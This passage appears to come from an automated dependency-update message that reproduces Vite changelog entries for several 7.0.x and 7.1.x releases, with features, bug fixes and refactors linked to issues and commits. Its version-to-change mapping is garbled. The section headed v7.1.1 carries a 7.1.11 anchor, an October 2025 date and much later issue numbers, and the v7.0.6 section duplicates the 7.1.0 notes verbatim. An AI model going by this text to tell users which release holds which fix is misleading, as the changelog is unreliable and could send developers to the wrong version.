([#&#8203;20640](https://redirect.github.com/vitejs/vite/issues/20640))
([1559577](https://redirect.github.com/vitejs/vite/commit/15595773170c2a07f2efdccee05964fb87c19ae6))

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;20634](https://redirect.github.com/vitejs/vite/issues/20634))
([4851cab](https://redirect.github.com/vitejs/vite/commit/4851cab3ba818b5f0f82eef3796b61d4b12768f1))
- **optimizer:** incorrect incompatible error
([#&#8203;20439](https://redirect.github.com/vitejs/vite/issues/20439))
([446fe83](https://redirect.github.com/vitejs/vite/commit/446fe83033686dd38d13b786a217b8277b5c5f09))
- support multiline new URL(..., import.meta.url) expressions
([#&#8203;20644](https://redirect.github.com/vitejs/vite/issues/20644))
([9ccf142](https://redirect.github.com/vitejs/vite/commit/9ccf142764d48292aa33e5ca6f020a7d55b97f61))

##### Performance Improvements

- **cli:** dynamically import `resolveConfig`
([#&#8203;20646](https://redirect.github.com/vitejs/vite/issues/20646))
([f691f57](https://redirect.github.com/vitejs/vite/commit/f691f57e46118328e00174160ceab2101b7256ca))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20633](https://redirect.github.com/vitejs/vite/issues/20633))
([98b92e8](https://redirect.github.com/vitejs/vite/commit/98b92e8c4b10ae87c48292a8ac09b01ca81a02cf))

##### Code Refactoring

- replace startsWith with strict equality
([#&#8203;20603](https://redirect.github.com/vitejs/vite/issues/20603))
([42816de](https://redirect.github.com/vitejs/vite/commit/42816dee0e177dded1c9de4d9099089ec4acef96))
- use `import` in worker threads
([#&#8203;20641](https://redirect.github.com/vitejs/vite/issues/20641))
([530687a](https://redirect.github.com/vitejs/vite/commit/530687a344c51daf3115d1c134586bbde58356e0))

##### Tests

- remove `checkNodeVersion` test
([#&#8203;20647](https://redirect.github.com/vitejs/vite/issues/20647))
([731d3e6](https://redirect.github.com/vitejs/vite/commit/731d3e61f444f6c5e611f67b531416ed6450f90f))

###
[`v7.1.2`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-712-2025-08-12-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.1...v7.1.2)

##### Bug Fixes

- **client:** add `[vite]` prefixes to debug logs
([#&#8203;20595](https://redirect.github.com/vitejs/vite/issues/20595))
([7cdef61](https://redirect.github.com/vitejs/vite/commit/7cdef612a65da5363905723f77516b6745ac9a94))
- **config:** make debugger work with bundle loader
([#&#8203;20573](https://redirect.github.com/vitejs/vite/issues/20573))
([c583927](https://redirect.github.com/vitejs/vite/commit/c583927bee657f15f63fdf80468fbe6a74eacdec))
- **deps:** update all non-major dependencies
([#&#8203;20587](https://redirect.github.com/vitejs/vite/issues/20587))
([20d4817](https://redirect.github.com/vitejs/vite/commit/20d48172a0352d32f766b3c878d52a8944fdbf6e))
- don't consider ids with `npm:` prefix as a built-in module
([#&#8203;20558](https://redirect.github.com/vitejs/vite/issues/20558))
([ab33803](https://redirect.github.com/vitejs/vite/commit/ab33803f2c831a82ddee637ad62e0c4ceeb663f1))
- **hmr:** watch non-inlined assets referenced by CSS
([#&#8203;20581](https://redirect.github.com/vitejs/vite/issues/20581))
([b7d494b](https://redirect.github.com/vitejs/vite/commit/b7d494bf60af3ef7316d87266bb3ebf56617d5fd))
- **module-runner:** prevent crash when sourceMappingURL pattern appears
in string literals
([#&#8203;20554](https://redirect.github.com/vitejs/vite/issues/20554))
([2770478](https://redirect.github.com/vitejs/vite/commit/2770478d1c190d3e3de34ef9a3d2c493c06e9933))

##### Miscellaneous Chores

- **deps:** migrate to `@jridgewell/remapping` from
`@ampproject/remapping`
([#&#8203;20577](https://redirect.github.com/vitejs/vite/issues/20577))
([0a6048a](https://redirect.github.com/vitejs/vite/commit/0a6048aba4523f451edf29ae4037d252cc963815))
- **deps:** update rolldown-related dependencies
([#&#8203;20586](https://redirect.github.com/vitejs/vite/issues/20586))
([77632c5](https://redirect.github.com/vitejs/vite/commit/77632c55db51cd6d03bcf24a1cef8d21058100a3))

###
[`v7.1.1`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.0...v7.1.1)

##### Bug Fixes

- **dev:** trim trailing slash before `server.fs.deny` check
([#&#8203;20968](https://redirect.github.com/vitejs/vite/issues/20968))
([f479cc5](https://redirect.github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed))

##### Miscellaneous Chores

- **deps:** update all non-major dependencies
([#&#8203;20966](https://redirect.github.com/vitejs/vite/issues/20966))
([6fb41a2](https://redirect.github.com/vitejs/vite/commit/6fb41a260bda443685e719ea4765d3faca3db944))

##### Code Refactoring

- use subpath imports for types module reference
([#&#8203;20921](https://redirect.github.com/vitejs/vite/issues/20921))
([d0094af](https://redirect.github.com/vitejs/vite/commit/d0094af639d9ebbb51d4e00910b74f23eb8fe131))

##### Build System

- remove cjs reference in files field
([#&#8203;20945](https://redirect.github.com/vitejs/vite/issues/20945))
([ef411ce](https://redirect.github.com/vitejs/vite/commit/ef411cee2696af3ba791879fdae9aad165f178b2))
- remove hash from built filenames
([#&#8203;20946](https://redirect.github.com/vitejs/vite/issues/20946))
([a817307](https://redirect.github.com/vitejs/vite/commit/a81730754d655d1371ce0f4354af1c84e12f9f2d))

###
[`v7.1.0`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#710-2025-08-07)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.8...v7.1.0)

##### Features

- support files with more than 1000 lines by `generateCodeFrame`
([#&#8203;20508](https://redirect.github.com/vitejs/vite/issues/20508))
([e7d0b2a](https://redirect.github.com/vitejs/vite/commit/e7d0b2afa56840dabbbad10015dc04083caaf248))
- add `import.meta.main` support in config (bundle config loader)
([#&#8203;20516](https://redirect.github.com/vitejs/vite/issues/20516))
([5d3e3c2](https://redirect.github.com/vitejs/vite/commit/5d3e3c2ae5a2174941fd09fd7842794a287c3ab7))
- **optimizer:** improve dependency optimization error messages with
esbuild formatMessages
([#&#8203;20525](https://redirect.github.com/vitejs/vite/issues/20525))
([d17cfed](https://redirect.github.com/vitejs/vite/commit/d17cfeda0741e4476570700a00b7b37917c97700))
- **ssr:** add `import.meta.main` support for Node.js module runner
([#&#8203;20517](https://redirect.github.com/vitejs/vite/issues/20517))
([794a8f2](https://redirect.github.com/vitejs/vite/commit/794a8f230218a3b1e148defc5a2d7a67409177ff))
- add `future: 'warn'`
([#&#8203;20473](https://redirect.github.com/vitejs/vite/issues/20473))
([e6aaf17](https://redirect.github.com/vitejs/vite/commit/e6aaf17ca21544572941957ce71bd8dbdc94e402))
- add `removeServerPluginContainer` future deprecation
([#&#8203;20437](https://redirect.github.com/vitejs/vite/issues/20437))
([c1279e7](https://redirect.github.com/vitejs/vite/commit/c1279e75401ac6ea1d0678da88414a76ff36b6fe))
- add `removeServerReloadModule` future deprecation
([#&#8203;20436](https://redirect.github.com/vitejs/vite/issues/20436))
([6970d17](https://redirect.github.com/vitejs/vite/commit/6970d1740cebd56af696abf60f30adb0c060f578))
- add `server.warmupRequest` to future deprecation
([#&#8203;20431](https://redirect.github.com/vitejs/vite/issues/20431))
([8ad388a](https://redirect.github.com/vitejs/vite/commit/8ad388aeab0dc79e4bc14859b91174427805a46b))
- add `ssrFixStacktrace` / `ssrRewriteStacktrace` to
`removeSsrLoadModule` future deprecation
([#&#8203;20435](https://redirect.github.com/vitejs/vite/issues/20435))
([8c8f587](https://redirect.github.com/vitejs/vite/commit/8c8f5879ead251705c2c363f5b8b94f618fbf374))
- **client:** ping from SharedWorker
([#&#8203;19057](https://redirect.github.com/vitejs/vite/issues/19057))
([5c97c22](https://redirect.github.com/vitejs/vite/commit/5c97c22548476e5f80856ece1d80b9234a7e6ecb))
- **dev:** add `this.fs` support
([#&#8203;20301](https://redirect.github.com/vitejs/vite/issues/20301))
([0fe3f2f](https://redirect.github.com/vitejs/vite/commit/0fe3f2f7c325c5990f1059c28b66b24e1b8fd5d3))
- export `defaultExternalConditions`
([#&#8203;20279](https://redirect.github.com/vitejs/vite/issues/20279))
([344d302](https://redirect.github.com/vitejs/vite/commit/344d30243b107852b133175e947a0410ea703f00))
- implement `removePluginHookSsrArgument` future deprecation
([#&#8203;20433](https://redirect.github.com/vitejs/vite/issues/20433))
([95927d9](https://redirect.github.com/vitejs/vite/commit/95927d9c0ba1cb0b3bd8c900f039c099f8e29f90))
- implement `removeServerHot` future deprecation
([#&#8203;20434](https://redirect.github.com/vitejs/vite/issues/20434))
([259f45d](https://redirect.github.com/vitejs/vite/commit/259f45d0698a184d6ecc352b610001fa1acdcee1))
- resolve server URLs before calling other listeners
([#&#8203;19981](https://redirect.github.com/vitejs/vite/issues/19981))
([45f6443](https://redirect.github.com/vitejs/vite/commit/45f6443a935258d8eee62874f0695b8c1c60a481))
- **ssr:** resolve externalized packages with
`resolve.externalConditions` and add `module-sync` to default external
condition
([#&#8203;20409](https://redirect.github.com/vitejs/vite/issues/20409))
([c669c52](https://redirect.github.com/vitejs/vite/commit/c669c524e6008a4902169f4b2f865e892297acf3))
- **ssr:** support `import.meta.resolve` in module runner
([#&#8203;20260](https://redirect.github.com/vitejs/vite/issues/20260))
([62835f7](https://redirect.github.com/vitejs/vite/commit/62835f7c06d37802f0bc2abbf58bbaeaa8c73ce5))

##### Bug Fixes

- **css:** avoid warnings for `image-set` containing `__VITE_ASSET__`
([#&#8203;20520](https://redirect.github.com/vitejs/vite/issues/20520))
([f1a2635](https://redirect.github.com/vitejs/vite/commit/f1a2635e6977a3eda681bec036f64f07686dad0d))
- **css:** empty CSS entry points should generate CSS files, not JS
files
([#&#8203;20518](https://redirect.github.com/vitejs/vite/issues/20518))
([bac9f3e](https://redirect.github.com/vitejs/vite/commit/bac9f3ecf84ae5c5add6ef224ae057508247f89e))
- **dev:** denied request stalled when requested concurrently
([#&#8203;20503](https://redirect.github.com/vitejs/vite/issues/20503))
([64a52e7](https://redirect.github.com/vitejs/vite/commit/64a52e70d9250b16aa81ce2df27c23fe56907257))
- **manifest:** initialize `entryCssAssetFileNames` as an empty Set
([#&#8203;20542](https://redirect.github.com/vitejs/vite/issues/20542))
([6a46cda](https://redirect.github.com/vitejs/vite/commit/6a46cdac5dece70296d1179640958deeeb2e6c19))
- skip prepareOutDirPlugin in workers
([#&#8203;20556](https://redirect.github.com/vitejs/vite/issues/20556))
([97d5111](https://redirect.github.com/vitejs/vite/commit/97d5111645a395dae48b16b110bc76c1ee8956c8))
- **asset:** only watch existing files for `new URL(, import.meta.url)`
([#&#8203;20507](https://redirect.github.com/vitejs/vite/issues/20507))
([1b211fd](https://redirect.github.com/vitejs/vite/commit/1b211fd1beccd0fc13bec700815abaa9f54147e8))
- **client:** keep ping on WS constructor error
([#&#8203;20512](https://redirect.github.com/vitejs/vite/issues/20512))
([3676da5](https://redirect.github.com/vitejs/vite/commit/3676da5bc5b2b69b28619b8521fca94d30468fe5))
- **deps:** update all non-major dependencies
([#&#8203;20537](https://redirect.github.com/vitejs/vite/issues/20537))
([fc9a9d3](https://redirect.github.com/vitejs/vite/commit/fc9a9d3f1493caa3d614f64e0a61fd5684f0928b))
- don't resolve as relative for specifiers starting with a dot
([#&#8203;20528](https://redirect.github.com/vitejs/vite/issues/20528))
([c5a10ec](https://redirect.github.com/vitejs/vite/commit/c5a10ec004130bec17cf42760b76d1d404008fa3))
- **html:** allow control character in input stream
([#&#8203;20483](https://redirect.github.com/vitejs/vite/issues/20483))
([c12a4a7](https://redirect.github.com/vitejs/vite/commit/c12a4a76a299237a0a13b885c72fdda6e4a3c9b7))
- merge old and new `noExternal: true` correctly
([#&#8203;20502](https://redirect.github.com/vitejs/vite/issues/20502))
([9ebe4a5](https://redirect.github.com/vitejs/vite/commit/9ebe4a514a2e48e3fe194f16b0556a45ff38077a))
- **deps:** update all non-major dependencies
([#&#8203;20489](https://redirect.github.com/vitejs/vite/issues/20489))
([f6aa04a](https://redirect.github.com/vitejs/vite/commit/f6aa04a52d486c8881f666c450caa3dab3c6bba1))
- **dev:** denied requests overly
([#&#8203;20410](https://redirect.github.com/vitejs/vite/issues/20410))
([4be5270](https://redirect.github.com/vitejs/vite/commit/4be5270b27f7e6323f1771974b4b3520d86600e4))
- **hmr:** register css deps as `type: asset`
([#&#8203;20391](https://redirect.github.com/vitejs/vite/issues/20391))
([7eac8dd](https://redirect.github.com/vitejs/vite/commit/7eac8ddb65033b8c001d6c6bc46aaeeefb79680a))
- **optimizer:** discover correct jsx runtime during scan
([#&#8203;20495](https://redirect.github.com/vitejs/vite/issues/20495))
([10d48bb](https://redirect.github.com/vitejs/vite/commit/10d48bb2e30824d217e415a58cea9e69c2820c2a))
- **preview:** set correct host for `resolvedUrls`
([#&#8203;20496](https://redirect.github.com/vitejs/vite/issues/20496))
([62b3e0d](https://redirect.github.com/vitejs/vite/commit/62b3e0d95c143e2f8b4e88d99c381d23663025ee))
- **worker:** resolve WebKit compat with inline workers by deferring
blob URL revocation
([#&#8203;20460](https://redirect.github.com/vitejs/vite/issues/20460))
([8033e5b](https://redirect.github.com/vitejs/vite/commit/8033e5bf8d3ff43995d0620490ed8739c59171dd))

##### Performance Improvements

- **client:** reduce reload debounce
([#&#8203;20429](https://redirect.github.com/vitejs/vite/issues/20429))
([22ad43b](https://redirect.github.com/vitejs/vite/commit/22ad43b4bf2435efe78a65b84e8469b23521900a))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20536](https://redirect.github.com/vitejs/vite/issues/20536))
([8be2787](https://redirect.github.com/vitejs/vite/commit/8be278748a92b128c49a24619d8d537dd2b08ceb))
- **deps:** update dependency parse5 to v8
([#&#8203;20490](https://redirect.github.com/vitejs/vite/issues/20490))
([744582d](https://redirect.github.com/vitejs/vite/commit/744582d0187c50045fb6cf229e3fab13093af08e))
- format
([f20addc](https://redirect.github.com/vitejs/vite/commit/f20addc5363058f5fd797e5bc71fab3877ed0a76))
- stablize `cssScopeTo`
([#&#8203;19592](https://redirect.github.com/vitejs/vite/issues/19592))
([ced1343](https://redirect.github.com/vitejs/vite/commit/ced13433fb71e2101850a4da1b0ef70cbc38b804))

##### Code Refactoring

- use hook filters in the worker plugin
([#&#8203;20527](https://redirect.github.com/vitejs/vite/issues/20527))
([958cdf2](https://redirect.github.com/vitejs/vite/commit/958cdf24f882be6953ca20912dd30c84213b069b))
- extract prepareOutDir as a plugin
([#&#8203;20373](https://redirect.github.com/vitejs/vite/issues/20373))
([2c4af1f](https://redirect.github.com/vitejs/vite/commit/2c4af1f90b3ac98df6f4585a329528e6bd850462))
- extract resolve rollup options
([#&#8203;20375](https://redirect.github.com/vitejs/vite/issues/20375))
([61a9778](https://redirect.github.com/vitejs/vite/commit/61a97780e6c54adb87345cb8c1f5f0d8e9ca5c05))
- rewrite openchrome.applescript to JXA
([#&#8203;20424](https://redirect.github.com/vitejs/vite/issues/20424))
([7979f9d](https://redirect.github.com/vitejs/vite/commit/7979f9da555aa16bd221b32ea78ce8cb5292fac4))
- use `http-proxy-3`
([#&#8203;20402](https://redirect.github.com/vitejs/vite/issues/20402))
([26d9872](https://redirect.github.com/vitejs/vite/commit/26d987232aad389733a7635b92122bb1d78dfcad))
- use hook filters in internal plugins
([#&#8203;20358](https://redirect.github.com/vitejs/vite/issues/20358))
([f19c4d7](https://redirect.github.com/vitejs/vite/commit/f19c4d72de142814994e30120aa4ad57552cb874))
- use hook filters in internal resolve plugin
([#&#8203;20480](https://redirect.github.com/vitejs/vite/issues/20480))
([acd2a13](https://redirect.github.com/vitejs/vite/commit/acd2a13c2d80e8c5c721bcf9738dfc03346cbfe1))

##### Tests

- detect ts support via `process.features`
([#&#8203;20544](https://redirect.github.com/vitejs/vite/issues/20544))
([856d3f0](https://redirect.github.com/vitejs/vite/commit/856d3f06e6889979f630c8453fa385f01d8adaba))
- fix unimportant errors in test-unit
([#&#8203;20545](https://redirect.github.com/vitejs/vite/issues/20545))
([1f23554](https://redirect.github.com/vitejs/vite/commit/1f235545b14a51d41b19a49da4a7e3a8e8eb5d10))

##### Beta Changelogs

#####
[7.1.0-beta.1](https://redirect.github.com/vitejs/vite/compare/v7.1.0-beta.0...v7.1.0-beta.1)
(2025-08-05)

See [7.1.0-beta.1
changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.1/packages/vite/CHANGELOG.md)

#####
[7.1.0-beta.0](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.1.0-beta.0)
(2025-07-30)

See [7.1.0-beta.0
changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.0/packages/vite/CHANGELOG.md)

###
[`v7.0.8`](https://redirect.github.com/vitejs/vite/releases/tag/v7.0.8)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.7...v7.0.8)

Please refer to
[CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v7.0.8/packages/vite/CHANGELOG.md)
for details.

###
[`v7.0.7`](https://redirect.github.com/vitejs/vite/releases/tag/v7.0.7)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.0.7)

Please refer to
[CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v7.0.7/packages/vite/CHANGELOG.md)
for details.

###
[`v7.0.6`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#710-2025-08-07)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.5...v7.0.6)

##### Features

- support files with more than 1000 lines by `generateCodeFrame`
([#&#8203;20508](https://redirect.github.com/vitejs/vite/issues/20508))
([e7d0b2a](https://redirect.github.com/vitejs/vite/commit/e7d0b2afa56840dabbbad10015dc04083caaf248))
- add `import.meta.main` support in config (bundle config loader)
([#&#8203;20516](https://redirect.github.com/vitejs/vite/issues/20516))
([5d3e3c2](https://redirect.github.com/vitejs/vite/commit/5d3e3c2ae5a2174941fd09fd7842794a287c3ab7))
- **optimizer:** improve dependency optimization error messages with
esbuild formatMessages
([#&#8203;20525](https://redirect.github.com/vitejs/vite/issues/20525))
([d17cfed](https://redirect.github.com/vitejs/vite/commit/d17cfeda0741e4476570700a00b7b37917c97700))
- **ssr:** add `import.meta.main` support for Node.js module runner
([#&#8203;20517](https://redirect.github.com/vitejs/vite/issues/20517))
([794a8f2](https://redirect.github.com/vitejs/vite/commit/794a8f230218a3b1e148defc5a2d7a67409177ff))
- add `future: 'warn'`
([#&#8203;20473](https://redirect.github.com/vitejs/vite/issues/20473))
([e6aaf17](https://redirect.github.com/vitejs/vite/commit/e6aaf17ca21544572941957ce71bd8dbdc94e402))
- add `removeServerPluginContainer` future deprecation
([#&#8203;20437](https://redirect.github.com/vitejs/vite/issues/20437))
([c1279e7](https://redirect.github.com/vitejs/vite/commit/c1279e75401ac6ea1d0678da88414a76ff36b6fe))
- add `removeServerReloadModule` future deprecation
([#&#8203;20436](https://redirect.github.com/vitejs/vite/issues/20436))
([6970d17](https://redirect.github.com/vitejs/vite/commit/6970d1740cebd56af696abf60f30adb0c060f578))
- add `server.warmupRequest` to future deprecation
([#&#8203;20431](https://redirect.github.com/vitejs/vite/issues/20431))
([8ad388a](https://redirect.github.com/vitejs/vite/commit/8ad388aeab0dc79e4bc14859b91174427805a46b))
- add `ssrFixStacktrace` / `ssrRewriteStacktrace` to
`removeSsrLoadModule` future deprecation
([#&#8203;20435](https://redirect.github.com/vitejs/vite/issues/20435))
([8c8f587](https://redirect.github.com/vitejs/vite/commit/8c8f5879ead251705c2c363f5b8b94f618fbf374))
- **client:** ping from SharedWorker
([#&#8203;19057](https://redirect.github.com/vitejs/vite/issues/19057))
([5c97c22](https://redirect.github.com/vitejs/vite/commit/5c97c22548476e5f80856ece1d80b9234a7e6ecb))
- **dev:** add `this.fs` support
([#&#8203;20301](https://redirect.github.com/vitejs/vite/issues/20301))
([0fe3f2f](https://redirect.github.com/vitejs/vite/commit/0fe3f2f7c325c5990f1059c28b66b24e1b8fd5d3))
- export `defaultExternalConditions`
([#&#8203;20279](https://redirect.github.com/vitejs/vite/issues/20279))
([344d302](https://redirect.github.com/vitejs/vite/commit/344d30243b107852b133175e947a0410ea703f00))
- implement `removePluginHookSsrArgument` future deprecation
([#&#8203;20433](https://redirect.github.com/vitejs/vite/issues/20433))
([95927d9](https://redirect.github.com/vitejs/vite/commit/95927d9c0ba1cb0b3bd8c900f039c099f8e29f90))
- implement `removeServerHot` future deprecation
([#&#8203;20434](https://redirect.github.com/vitejs/vite/issues/20434))
([259f45d](https://redirect.github.com/vitejs/vite/commit/259f45d0698a184d6ecc352b610001fa1acdcee1))
- resolve server URLs before calling other listeners
([#&#8203;19981](https://redirect.github.com/vitejs/vite/issues/19981))
([45f6443](https://redirect.github.com/vitejs/vite/commit/45f6443a935258d8eee62874f0695b8c1c60a481))
- **ssr:** resolve externalized packages with
`resolve.externalConditions` and add `module-sync` to default external
condition
([#&#8203;20409](https://redirect.github.com/vitejs/vite/issues/20409))
([c669c52](https://redirect.github.com/vitejs/vite/commit/c669c524e6008a4902169f4b2f865e892297acf3))
- **ssr:** support `import.meta.resolve` in module runner
([#&#8203;20260](https://redirect.github.com/vitejs/vite/issues/20260))
([62835f7](https://redirect.github.com/vitejs/vite/commit/62835f7c06d37802f0bc2abbf58bbaeaa8c73ce5))

##### Bug Fixes

- **css:** avoid warnings for `image-set` containing `__VITE_ASSET__`
([#&#8203;20520](https://redirect.github.com/vitejs/vite/issues/20520))
([f1a2635](https://redirect.github.com/vitejs/vite/commit/f1a2635e6977a3eda681bec036f64f07686dad0d))
- **css:** empty CSS entry points should generate CSS files, not JS
files
([#&#8203;20518](https://redirect.github.com/vitejs/vite/issues/20518))
([bac9f3e](https://redirect.github.com/vitejs/vite/commit/bac9f3ecf84ae5c5add6ef224ae057508247f89e))
- **dev:** denied request stalled when requested concurrently
([#&#8203;20503](https://redirect.github.com/vitejs/vite/issues/20503))
([64a52e7](https://redirect.github.com/vitejs/vite/commit/64a52e70d9250b16aa81ce2df27c23fe56907257))
- **manifest:** initialize `entryCssAssetFileNames` as an empty Set
([#&#8203;20542](https://redirect.github.com/vitejs/vite/issues/20542))
([6a46cda](https://redirect.github.com/vitejs/vite/commit/6a46cdac5dece70296d1179640958deeeb2e6c19))
- skip prepareOutDirPlugin in workers
([#&#8203;20556](https://redirect.github.com/vitejs/vite/issues/20556))
([97d5111](https://redirect.github.com/vitejs/vite/commit/97d5111645a395dae48b16b110bc76c1ee8956c8))
- **asset:** only watch existing files for `new URL(, import.meta.url)`
([#&#8203;20507](https://redirect.github.com/vitejs/vite/issues/20507))
([1b211fd](https://redirect.github.com/vitejs/vite/commit/1b211fd1beccd0fc13bec700815abaa9f54147e8))
- **client:** keep ping on WS constructor error
([#&#8203;20512](https://redirect.github.com/vitejs/vite/issues/20512))
([3676da5](https://redirect.github.com/vitejs/vite/commit/3676da5bc5b2b69b28619b8521fca94d30468fe5))
- **deps:** update all non-major dependencies
([#&#8203;20537](https://redirect.github.com/vitejs/vite/issues/20537))
([fc9a9d3](https://redirect.github.com/vitejs/vite/commit/fc9a9d3f1493caa3d614f64e0a61fd5684f0928b))
- don't resolve as relative for specifiers starting with a dot
([#&#8203;20528](https://redirect.github.com/vitejs/vite/issues/20528))
([c5a10ec](https://redirect.github.com/vitejs/vite/commit/c5a10ec004130bec17cf42760b76d1d404008fa3))
- **html:** allow control character in input stream
([#&#8203;20483](https://redirect.github.com/vitejs/vite/issues/20483))
([c12a4a7](https://redirect.github.com/vitejs/vite/commit/c12a4a76a299237a0a13b885c72fdda6e4a3c9b7))
- merge old and new `noExternal: true` correctly
([#&#8203;20502](https://redirect.github.com/vitejs/vite/issues/20502))
([9ebe4a5](https://redirect.github.com/vitejs/vite/commit/9ebe4a514a2e48e3fe194f16b0556a45ff38077a))
- **deps:** update all non-major dependencies
([#&#8203;20489](https://redirect.github.com/vitejs/vite/issues/20489))
([f6aa04a](https://redirect.github.com/vitejs/vite/commit/f6aa04a52d486c8881f666c450caa3dab3c6bba1))
- **dev:** denied requests overly
([#&#8203;20410](https://redirect.github.com/vitejs/vite/issues/20410))
([4be5270](https://redirect.github.com/vitejs/vite/commit/4be5270b27f7e6323f1771974b4b3520d86600e4))
- **hmr:** register css deps as `type: asset`
([#&#8203;20391](https://redirect.github.com/vitejs/vite/issues/20391))
([7eac8dd](https://redirect.github.com/vitejs/vite/commit/7eac8ddb65033b8c001d6c6bc46aaeeefb79680a))
- **optimizer:** discover correct jsx runtime during scan
([#&#8203;20495](https://redirect.github.com/vitejs/vite/issues/20495))
([10d48bb](https://redirect.github.com/vitejs/vite/commit/10d48bb2e30824d217e415a58cea9e69c2820c2a))
- **preview:** set correct host for `resolvedUrls`
([#&#8203;20496](https://redirect.github.com/vitejs/vite/issues/20496))
([62b3e0d](https://redirect.github.com/vitejs/vite/commit/62b3e0d95c143e2f8b4e88d99c381d23663025ee))
- **worker:** resolve WebKit compat with inline workers by deferring
blob URL revocation
([#&#8203;20460](https://redirect.github.com/vitejs/vite/issues/20460))
([8033e5b](https://redirect.github.com/vitejs/vite/commit/8033e5bf8d3ff43995d0620490ed8739c59171dd))

##### Performance Improvements

- **client:** reduce reload debounce
([#&#8203;20429](https://redirect.github.com/vitejs/vite/issues/20429))
([22ad43b](https://redirect.github.com/vitejs/vite/commit/22ad43b4bf2435efe78a65b84e8469b23521900a))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20536](https://redirect.github.com/vitejs/vite/issues/20536))
([8be2787](https://redirect.github.com/vitejs/vite/commit/8be278748a92b128c49a24619d8d537dd2b08ceb))
- **deps:** update dependency parse5 to v8
([#&#8203;20490](https://redirect.github.com/vitejs/vite/issues/20490))
([744582d](https://redirect.github.com/vitejs/vite/commit/744582d0187c50045fb6cf229e3fab13093af08e))
- format
([f20addc](https://redirect.github.com/vitejs/vite/commit/f20addc5363058f5fd797e5bc71fab3877ed0a76))
- stablize `cssScopeTo`
([#&#8203;19592](https://redirect.github.com/vitejs/vite/issues/19592))
([ced1343](https://redirect.github.com/vitejs/vite/commit/ced13433fb71e2101850a4da1b0ef70cbc38b804))

##### Code Refactoring

- use hook filters in the worker plugin
([#&#8203;20527](https://redirect.github.com/vitejs/vite/issues/20527))
([958cdf2](https://redirect.github.com/vitejs/vite/commit/958cdf24f882be6953ca20912dd30c84213b069b))
- extract prepareOutDir as a plugin
([#&#8203;20373](https://redirect.github.com/vitejs/vite/issues/20373))
([2c4af1f](https://redirect.github.com/vitejs/vite/commit/2c4af1f90b3ac98df6f4585a329528e6bd850462))
- extract resolve rollup options
([#&#8203;20375](https://redirect.github.com/vitejs/vite/issues/20375))
([61a9778](https://redirect.github.com/vitejs/vite/commit/61a97780e6c54adb87345cb8c1f5f0d8e9ca5c05))
- rewrite openchrome.applescript to JXA
([#&#8203;20424](https://redirect.github.com/vitejs/vite/issues/20424))
([7979f9d](https://redirect.github.com/vitejs/vite/commit/7979f9da555aa16bd221b32ea78ce8cb5292fac4))
- use `http-proxy-3`
([#&#8203;20402](https://redirect.github.com/vitejs/vite/issues/20402))
([26d9872](https://redirect.github.com/vitejs/vite/commit/26d987232aad389733a7635b92122bb1d78dfcad))
- use hook filters in internal plugins
([#&#8203;20358](https://redirect.github.com/vitejs/vite/issues/20358))
([f19c4d7](https://redirect.github.com/vitejs/vite/commit/f19c4d72de142814994e30120aa4ad57552cb874))
- use hook filters in internal resolve plugin
([#&#8203;20480](https://redirect.github.com/vitejs/vite/issues/20480))
([acd2a13](https://redirect.github.com/vitejs/vite/commit/acd2a13c2d80e8c5c721bcf9738dfc03346cbfe1))

##### Tests

- detect ts support via `process.features`
([#&#8203;20544](https://redirect.github.com/vitejs/vite/issues/20544))
([856d3f0](https://redirect.github.com/vitejs/vite/commit/856d3f06e6889979f630c8453fa385f01d8adaba))
- fix unimportant errors in test-unit
([#&#8203;20545](https://redirect.github.com/vitejs/vite/issues/20545))
([1f23554](https://redirect.github.com/vitejs/vite/commit/1f235545b14a51d41b19a49da4a7e3a8e8eb5d10))

##### Beta Changelogs

#####
[7.1.0-beta.1](https://redirect.github.com/vitejs/vite/compare/v7.1.0-beta.0...v7.1.0-beta.1)
(2025-08-05)

See [7.1.0-beta.1
changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.1/packages/vite/CHANGELOG.md)

#####
[7.1.0-beta.0](https://redirect.github.com/vitejs/vite/compare/v7.0.6...v7.1.0-beta.0)
(2025-07-30)

See [7.1.0-beta.0
changelog](https://redirect.github.com/vitejs/vite/blob/v7.1.0-beta.0/packages/vite/CHANGELOG.md)

###
[`v7.0.5`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-705-2025-07-17-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.4...v7.0.5)

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;20406](https://redirect.github.com/vitejs/vite/issues/20406))
([1a1cc8a](https://redirect.github.com/vitejs/vite/commit/1a1cc8a435a21996255b3e5cc75ed4680de2a7f3))
- remove special handling for `Accept: text/html`
([#&#8203;20376](https://redirect.github.com/vitejs/vite/issues/20376))
([c9614b9](https://redirect.github.com/vitejs/vite/commit/c9614b9c378be4a32e84f37be71a8becce52af7b))
- watch assets referenced by `new URL(, import.meta.url)`
([#&#8203;20382](https://redirect.github.com/vitejs/vite/issues/20382))
([6bc8bf6](https://redirect.github.com/vitejs/vite/commit/6bc8bf634d4a2c9915da9813963dd80a4186daeb))

##### Miscellaneous Chores

- **deps:** update dependency rolldown to ^1.0.0-beta.27
([#&#8203;20405](https://redirect.github.com/vitejs/vite/issues/20405))
